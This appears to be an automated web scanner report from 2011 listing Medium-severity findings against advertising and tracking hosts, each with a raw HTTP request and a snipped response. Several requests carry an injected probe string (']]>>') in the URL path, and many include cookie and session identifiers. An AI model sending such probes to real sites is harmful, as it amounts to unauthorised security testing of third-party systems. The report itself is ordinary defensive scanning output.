HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 17 Sep 2011 16:48:12 GMT Server: lighttpd-yt/1.4.18 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://tcr.tynt.com |
Path: | /javascripts/Tracer.js |
GET /javascripts]]>>/Tracer.js?user Host: tcr.tynt.com Proxy-Connection: keep-alive Referer: http://www.thedailygreen User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uid=CgUVaU5iygRBfFDr |
HTTP/1.1 404 Not Found Cache-Control: max-age=1800 Content-Type: text/html Date: Sat, 17 Sep 2011 16:28:18 GMT Expires: Sat, 17 Sep 2011 16:58:18 GMT Server: EOS (lax001/54E5) Content-Length: 454 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://tcr.tynt.com |
Path: | /javascripts/Tracer.js |
GET /javascripts/Tracer.js]]>>?user=acOw60thSr3PRG Host: tcr.tynt.com Proxy-Connection: keep-alive Referer: http://www.thedailygreen User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uid=CgUVaU5iygRBfFDr |
HTTP/1.1 404 Not Found Cache-Control: max-age=1800 Content-Type: text/html Date: Sat, 17 Sep 2011 16:28:18 GMT Expires: Sat, 17 Sep 2011 16:58:18 GMT Server: EOS (lax001/54E5) Content-Length: 454 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://widget.newsinc.com |
Path: | /_fw/common/toppicks |
GET /_fw]]>>/common/toppicks_common1 Host: widget.newsinc.com Proxy-Connection: keep-alive Referer: http://widget.newsinc.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-1483107276 |
HTTP/1.1 404 Not Found x-amz-request-id: 4BCC01CF09358BF9 x-amz-id-2: NCAYj3RgleahyU9q1 Content-Type: application/xml Date: Sat, 17 Sep 2011 16:24:07 GMT Server: AmazonS3 Content-Length: 301 <?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchKey< ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://widget.newsinc.com |
Path: | /_fw/common/toppicks |
GET /_fw/common]]>>/toppicks_common1.html Host: widget.newsinc.com Proxy-Connection: keep-alive Referer: http://widget.newsinc.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-1483107276 |
HTTP/1.1 404 Not Found x-amz-request-id: 68D87CF9447DC0FE x-amz-id-2: rPUISVhLeu7Xu4sKW8kj Content-Type: application/xml Date: Sat, 17 Sep 2011 16:24:08 GMT Server: AmazonS3 Content-Length: 301 <?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchKey< ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://widget.newsinc.com |
Path: | /_fw/common/toppicks |
GET /_fw/common/toppicks Host: widget.newsinc.com Proxy-Connection: keep-alive Referer: http://widget.newsinc.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-1483107276 |
HTTP/1.1 404 Not Found x-amz-request-id: 54E359EE9AF0C6B8 x-amz-id-2: /u3u7SamzGNjbos Content-Type: application/xml Date: Sat, 17 Sep 2011 16:24:10 GMT Server: AmazonS3 Content-Length: 301 <?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchKey< ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://widget.newsinc.com |
Path: | /ndn_toppicks.html |
GET /ndn_toppicks.html]]>>?wid=1709&cid=507 Host: widget.newsinc.com Proxy-Connection: keep-alive Referer: http://www.stamforda User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-1483107276 |
HTTP/1.1 404 Not Found x-amz-request-id: FB0F1A3FBE5DE59A x-amz-id-2: InnYteLi2JcdkNLPD0ye4 Content-Type: application/xml Date: Sat, 17 Sep 2011 16:24:03 GMT Server: AmazonS3 Content-Length: 286 <?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchKey< ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.nexac.com |
Path: | /nai_optout.php |
GET /nai_optout.php]]>>?nocache=2.007604E-03 HTTP/1.1 Host: www.nexac.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: na_tc=Y; OAX=Mhd7ak48ZSEAAtYi |
HTTP/1.1 404 Not Found Expires: Wed Sep 15 09:14:42 MDT 2010 Pragma: no-cache P3P: policyref="http://www Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/ Content-Type: text/html Content-Length: 345 Date: Sat, 17 Sep 2011 17:23:52 GMT Server: lighttpd/1.4.18 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.nexac.com |
Path: | /nai_status.php |
GET /nai_status.php]]>>?nocache=6.434709E-02 HTTP/1.1 Host: www.nexac.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: na_id=ignore; na_tc=Y |
HTTP/1.1 404 Not Found Expires: Wed Sep 15 09:14:42 MDT 2010 Pragma: no-cache P3P: policyref="http://www Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/ Content-Type: text/html Content-Length: 345 Date: Sat, 17 Sep 2011 16:45:59 GMT Server: lighttpd/1.4.19 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://a.netmng.com |
Path: | /hic/ |
GET /hic/?nm_width=728&nm Host: a.netmng.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.gather.com Cookie: u=5f8e79cc-32a7-4701-a3f9 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:04:23 GMT Server: Apache/2.2.9 P3P: policyref="http://a Expires: Thu, 15 Sep 2011 17:04:23 GMT Last-Modified: Thu, 15 Sep 2011 17:04:23 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: evo5_display=%2BVh8H Content-Length: 768 Connection: close Content-Type: text/html; charset=UTF-8 <IFRAME SRC="http://ad.doubl ...[SNIP]... </IFRAME><img src="http://bh.contextweb |
Severity: | Medium |
Confidence: | Firm |
Host: | http://advertising.aol |
Path: | /nai/nai.php |
GET /nai/nai.php?action_id=4 HTTP/1.1 Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: token_nai_advertising_com |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 17:22:53 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Content-Type: text/html Content-Length: 13643 <html xmlns="http://www.w3.org <head> <script> // dynamic variables var numFrames = 9; var redirectUrlNoCookie = "http://www.networka var redire ...[SNIP]... <body onload='optOut();' > <iframe id='frame_0' src='http://nai <br /> <iframe id='frame_1' src='http://nai.adsonar <br /> <iframe id='frame_2' src='http://nai.tacoda.at <br /> <iframe id='frame_3' src='http://nai.adtech.de <br /> <iframe id='frame_4' src='http://nai.ad.us-ec <br /> <iframe id='frame_5' src='http://nai.adserver <br /> <iframe id='frame_6' src='http://nai <br /> <iframe id='frame_7' src='http://nai <br /> <iframe id='frame_8' src='http://nai.glb ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://bh.contextweb.com |
Path: | /bh/set.aspx |
GET /bh/set.aspx?action=clr Host: bh.contextweb.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://rs.gwallet.com/r1 Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02 |
HTTP/1.1 200 OK Server: GlassFish v3 CW-Server: cw-app600 Set-Cookie: V=ZZVrXBMk1mFi; Domain=.contextweb.com; Expires=Tue, 11-Sep-2012 17:04:35 GMT; Path=/ Set-Cookie: cwbh1=3055%3B10%2F02 Content-Type: image/gif Date: Sat, 17 Sep 2011 17:04:35 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Content-Length: 49 GIF89a................... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://info.yahoo.com |
Path: | /nai/nai-status.html |
GET /nai/nai-status.html Host: info.yahoo.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d |
HTTP/1.1 999 Unable to process request at this time -- error 999 Date: Sat, 17 Sep 2011 17:37:22 GMT Expires: Thu, 01 Jan 1970 22:00:00 GMT Cache-Control: no-cache, private Cache-Control: no-store Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 5244 <HTML> <HEAD> <meta http-equiv="Content-Type" content="text/html <!-- Title --> <TITLE> Yahoo! - 999 Unable to process request at this time -- error 999 </TITLE> <!----------------> ...[SNIP]... <!-- AltLogo --> <img src=http://arc.help.yahoo <!----------------> ...[SNIP]... <!-- Temporary --> While this error is usually temporary, if it continues and the above solutions don't resolve your problem, please <a href="http://arc.help ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://info.yahoo.com |
Path: | /nai/nai-verify.html |
GET /nai/nai-verify.html Host: info.yahoo.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: B=8d7n6ot73ufk2&b=4&d |
HTTP/1.1 999 Unable to process request at this time -- error 999 Date: Sat, 17 Sep 2011 17:22:48 GMT Expires: Thu, 01 Jan 1970 22:00:00 GMT Cache-Control: no-cache, private Cache-Control: no-store Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 5308 <HTML> <HEAD> <meta http-equiv="Content-Type" content="text/html <!-- Title --> <TITLE> Yahoo! - 999 Unable to process request at this time -- error 999 </TITLE> <!----------------> ...[SNIP]... <!-- AltLogo --> <img src=http://arc.help.yahoo <!----------------> ...[SNIP]... <!-- Temporary --> While this error is usually temporary, if it continues and the above solutions don't resolve your problem, please <a href="http://arc.help ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://info.yahoo.com |
Path: | /nai/optout.html |
GET /nai/optout.html?token=VjRBR0ZmS3AyMFQ- HTTP/1.1 Host: info.yahoo.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: B=8d7n6ot73ufk2&b=3&s=qd |
HTTP/1.1 302 Found Date: Sat, 17 Sep 2011 17:20:40 GMT P3P: policyref="http://info Location: http://www.networkad Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Cache-Control: private Content-Length: 81 <!-- w3.help.sp2.yahoo.com uncompressed/chunked Sat Sep 17 17:20:40 UTC 2011 --> |
Severity: | Medium |
Confidence: | Firm |
Host: | http://l.sharethis.com |
Path: | /pview |
GET /pview?event=pview Host: l.sharethis.com Proxy-Connection: keep-alive Referer: http://www.thedailygreen User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __stid=CqCKBE5ezzUzV |
HTTP/1.1 204 No Content Server: nginx/0.7.65 Date: Sat, 17 Sep 2011 16:28:06 GMT Connection: keep-alive |
Severity: | Medium |
Confidence: | Firm |
Host: | http://nai.ad.us-ec |
Path: | /nai/daa.php |
GET /nai/daa.php?action_id=4 Host: nai.ad.us-ec.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: OO_TOKEN=1128450710 |
HTTP/1.1 302 Found Date: Sat, 17 Sep 2011 17:23:53 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Location: http://advertising.aol Content-Length: 0 Content-Type: text/html |
Severity: | Medium |
Confidence: | Firm |
Host: | http://nai.adserver |
Path: | /nai/daa.php |
GET /nai/daa.php?action_id=4 Host: nai.adserver.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: OO_TOKEN=1348442932; criteoastro=1; JEB2=4E4934866E651A2 |
HTTP/1.1 302 Found Date: Sat, 17 Sep 2011 17:23:53 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Location: http://advertising.aol Content-Length: 0 Content-Type: text/html |
Severity: | Medium |
Confidence: | Firm |
Host: | http://nai.adserverec |
Path: | /nai/daa.php |
GET /nai/daa.php?action_id=4 Host: nai.adserverec.adtechus User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: OO_TOKEN=1581270199 |
HTTP/1.1 302 Found Date: Sat, 17 Sep 2011 17:25:17 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Location: http://advertising.aol Content-Length: 0 Content-Type: text/html |
Severity: | Medium |
Confidence: | Firm |
Host: | http://nai.adserverwc |
Path: | /nai/daa.php |
GET /nai/daa.php?action_id=4 Host: nai.adserverwc.adtechus User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: OO_TOKEN=52531776 |
HTTP/1.1 302 Found Date: Sat, 17 Sep 2011 17:25:13 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Location: http://advertising.aol Content-Length: 0 Content-Type: text/html |
Severity: | Medium |
Confidence: | Firm |
Host: | http://nai.adsonar.com |
Path: | /nai/daa.php |
GET /nai/daa.php?action_id=4 Host: nai.adsonar.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: OO_TOKEN=819977518 |
HTTP/1.1 302 Found Date: Sat, 17 Sep 2011 17:24:07 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Location: http://advertising.aol Content-Length: 0 Content-Type: text/html |
Severity: | Medium |
Confidence: | Firm |
Host: | http://nai.adtech.de |
Path: | /nai/daa.php |
GET /nai/daa.php?action_id=4 Host: nai.adtech.de User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: OO_TOKEN=8239370 |
HTTP/1.1 302 Found Date: Sat, 17 Sep 2011 17:23:53 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Location: http://advertising.aol Content-Length: 0 Content-Type: text/html |
Severity: | Medium |
Confidence: | Firm |
Host: | http://nai.advertising |
Path: | /nai/daa.php |
GET /nai/daa.php?action_id=4 Host: nai.advertising.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: OO_TOKEN=1812733584; ACID=tX790013123977920032 |
HTTP/1.1 302 Found Date: Sat, 17 Sep 2011 17:23:36 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Location: http://advertising.aol Content-Length: 0 Content-Type: text/html |
Severity: | Medium |
Confidence: | Firm |
Host: | http://nai.glb.adtechus |
Path: | /nai/daa.php |
GET /nai/daa.php?action_id=4 Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: OO_TOKEN=585997419 |
HTTP/1.1 302 Found Date: Sat, 17 Sep 2011 17:25:14 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Location: http://advertising.aol Content-Length: 0 Content-Type: text/html |
Severity: | Medium |
Confidence: | Firm |
Host: | http://nai.tacoda.at |
Path: | /nai/daa.php |
GET /nai/daa.php?action_id=4 Host: nai.tacoda.at.atwola.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: OO_TOKEN=1032347115; ATTACID=a3Z0aWQ9MTcy |
HTTP/1.1 302 Found Date: Sat, 17 Sep 2011 17:23:32 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Location: http://advertising.aol Content-Length: 0 Content-Type: text/html |
Severity: | Medium |
Confidence: | Firm |
Host: | http://rs.gwallet.com |
Path: | /r1/pixel/x1743 |
GET /r1/pixel/x1743 HTTP/1.1 Host: rs.gwallet.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.gather.com Cookie: ra1_uid=463957892987 |
HTTP/1.1 200 OK Content-Length: 140 Server: radiumone/1.2 Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate Content-type: text/html; charset=UTF-8 Expires: Tue, 29 Oct 2002 19:50:44 GMT Pragma: no-cache P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-cookie: ra1_uid=463957892987 Set-cookie: ra1_sgm=J7X1; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1 Set-cookie: ra1_sid=22; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1 Set-cookie: ra1_oo=1; Expires=Sat, 17-Sep-2016 17:04:29 GMT; Path=/; Domain=gwallet.com; Version=1 <html><body><img src="http://bh.contextweb |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.facebook.com |
Path: | /extern/login_status.php |
GET /extern/login_status.php Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.local.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: campaign_click_url= |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-FB-Server: X-Cnection: close Date: Sat, 17 Sep 2011 16:24:43 GMT Content-Length: 236 <script type="text/javascript"> parent.postMessage("cb ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.meebo.com |
Path: | /mcmd/events |
GET /mcmd/events?sessionKey=00000000000000000000 Host: www.meebo.com Proxy-Connection: keep-alive Referer: http://www.meebo.com/cim Cache-Control: max-age=0 If-Modified-Since: Wed Dec 31 1969 18:00:00 GMT-0600 (Central Standard Time) User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bcookie=24214e45185d |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 17 Sep 2011 16:25:44 GMT Connection: keep-alive Content-Type: text/plain; charset=utf-8 Cache-Control: no-cache Content-Length: 21 {"rev":2,"events":[]} |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.meebo.com |
Path: | /mcmd/subscribe |
GET /mcmd/subscribe Host: www.meebo.com Proxy-Connection: keep-alive Referer: http://www.meebo.com/cim Cache-Control: max-age=0 If-Modified-Since: Wed Dec 31 1969 18:00:00 GMT-0600 (Central Standard Time) User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bcookie=24214e45185d |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 17 Sep 2011 16:36:35 GMT Connection: keep-alive Content-Type: text/plain; charset=utf-8 Cache-Control: no-cache Content-Length: 57 {"stat":"fail","msg": |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.networkad |
Path: | /managing/optout_results |
POST /managing/optout_results Host: www.networkadvertising User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: __utma=1.519244467 Content-Type: application/x-www-form Content-Length: 873 optThis=1&optThis=2 ...[SNIP]... |
